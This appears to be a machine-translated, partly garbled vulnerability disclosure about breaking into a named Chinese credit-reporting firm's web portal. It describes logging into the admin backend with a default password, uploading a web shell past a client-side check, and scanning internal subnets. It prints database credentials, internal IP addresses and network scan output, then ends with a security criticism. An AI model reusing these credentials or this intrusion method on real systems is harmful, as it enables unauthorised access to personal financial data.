Getshell (involving the core network segments of the Intranet and Credit System)

Getshell (involving the core network segments of the Intranet and Credit System)

One of you has eight individual credit card licenses in China. In the credit investigation regulations, the license can be revoked for violation or leakage of information twice.

A credit investigation institution that operates an individual's credit investigation business shall comply with the company's establishment conditions and the following conditions as stipulated in the Company Law of the People's Republic of China, and be approved by the supervision and administration department of the information industry of the State Council:
(1) The primary shareholder has a good reputation and has no records of major violations in the past three years;
(2) The registered capital shall not be less than RMB 50 million;
(3) facilities, equipment, systems, and measures that comply with the regulations of the Information regulatory authority of the State Council to ensure information security;
(4) The proposed directors, supervisors and senior management personnel shall meet the requirements stipulated in Article 8 of these Regulations;
(5) other audit conditions stipulated by the supervision and administration department of the information industry of the State Council.

 

 

After searching for half a day, I finally found the background. Why the background? You can make it static. The homepage for credit investigation is basically like this. The main site.

Http://www.ccxcredit.com.cn/u_l



Since the password is admin 123456 (I also ran a 10 W dictionary, shit, sun of bitch /)





My inspiration tells me that, for such websites, getshell can certainly be used for uploading in the background.
 

The uploaded file is found. It should be possible to upload JS judgment.
 

Get shell
 

Find some intranet information:


 

#mysql configdb.driver.class=com.mysql.jdbc.Driver#db.url=jdbc:mysql://localhost:3306/zx_news_db#db.username=admin#db.password=admindb.url=jdbc:mysql://10.1.80.37:3306/zx_news_db?useUnicode=true&characterEncoding=UTF-8db.username=testdb.password=test#db.url=jdbc:mysql://10.0.5.152:3306/zx_news_db#db.username=root#db.password=123456#oracle config#db.driver.class = oracle.jdbc.driver.OracleDriver#db.url          = jdbc:oracle:thin:@10.0.1.40:1521:ccxe#db.username     = pccredit#db.password     = pccredit#db.schema       = PCCREDIT#org upload file dirorg_file_path = resources/file_uploads#nh xw score model supply project    1nh_xw_score_model_supplier = http://10.0.5.152:8080/ccx_credit_nm_20141210

 

ifconfig [/usr/tips/apache-tomcat-7.0.59/webapps/ccxportal/attached/image/20160127/]$ ifconfigbond0     Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8            inet addr:10.1.80.37  Bcast:10.1.80.255  Mask:255.255.255.0          inet6 addr: fe80::d685:64ff:fe48:e5d8/64 Scope:Link          UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1          RX packets:215013915 errors:0 dropped:0 overruns:0 frame:0          TX packets:105061985 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0           RX bytes:19123235861 (17.8 GiB)  TX bytes:112949825904 (105.1 GiB)eth0      Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8            UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1          RX packets:150213515 errors:0 dropped:0 overruns:0 frame:0          TX packets:105061984 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:14426070048 (13.4 GiB)  TX bytes:112949825810 (105.1 GiB)          Interrupt:114 Memory:fb000000-fb7fffff eth1      Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8            UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1          RX packets:64800400 errors:0 dropped:0 overruns:0 frame:0          TX packets:1 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:4697165813 (4.3 GiB)  TX bytes:94 (94.0 b)          Interrupt:122 Memory:fa000000-fa7fffff lo        Link encap:Local Loopback            inet addr:127.0.0.1  Mask:255.0.0.0          inet6 addr: ::1/128 Scope:Host          UP LOOPBACK RUNNING  MTU:16436  Metric:1          RX packets:20860426 errors:0 dropped:0 overruns:0 frame:0          TX packets:20860426 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0           RX bytes:24514978721 (22.8 GiB)  TX bytes:24514978721 (22.8 GiB)

How can I use such a password for credit investigation... Such a network structure...

Credit information must be guaranteed at level 3. How can this be done.



Scan the CIDR block information.
 

http://10.1.80.3 7> CITIC Credit Co. Ltd.> Apache-Coyote/1.1> Success http://10.1.80.45 > Insert title here> Apache-Coyote/1.1> Success http://10.1.80.2 1 >>>> Serv-U/10.5.0.11> Successhttp://10.1.80.3 > Log In-Juniper Web Device Manager> Mbedthis-Appweb/2.4.0> Success http://10.1.80.2 > Log In-Juniper Web Device Manager> Mbedthis-Appweb/2.4.0> Success http://10.1.80.1 > Log In-Juniper Web Device Manager> Mbedthis-Appweb/2.4.0> Success http://10.0.5.254 > Log In-Juniper Web Device Manager> Mbedthis-Appweb/2.4.0> Success10.1.130.56 http://10.1.130.57 > Phpinfo ()> Apache/2.2.3 (Red Hat)> Success http://10.1.130.55 >>>> Apache/2.2.6 (Win32) mod_jk/1.2.21> Success http://10.1.130.159 >>302 Found> Apache> Success http://10.1.130.111 >>>> Apache >> Success http://10.1.130.156 >>302 Found> Apache> Success http://10.1.130.112 >>>> Apache >> Success http://10.0.1.22 >>>> Apache/2.2.12 (Ubuntu)> Success http://10.0.1.28 > IIS7> Microsoft-IIS/7.5> Success http://10.0.1.250 > Index> Hikvision-Webs> Success http://10.0.1.254 > Log In-Juniper Web Device Manager> Mbedthis-Appweb/2.4.0> Success (APP production network disconnection) http://10.0.5.254 > Log In-Juniper Web Device Manager> Mbedthis-Appweb/2.4.0> Success

The CIDR block is not isolated. WAF now? IDS? IPS? Firewall? Private Network? VDI? Why are there no limits?



[/Usr/tips/apache-tomcat-7.0.59/webapps/ccxportal/attached/image/20160127/] $ nmap-iflist



Starting Nmap 4.11 (http://www.insecure.org/nmap/) at CST

************************ INTERFACES *************** *********

DEV (SHORT) IP/MASK TYPE UP MAC

Lo (lo) 127.0.0.1/8 loopback up

Bond0 (bond0) 10.1.80.37/24 ethernet up D4: 85: 64: 48: E5: D8



************* *************

DST/MASK DEV GATEWAY

10.1.80.0/0 bond0

169.254.0.0/0 bond0

0.0.0.0/0 bond0 10.1.80.1



My God.


 

Solution:

You are using all the data of the Chinese people. Such data leaks can revoke licenses. It's hard for you to get a license only after a thousand hardships? Have you forgotten XX?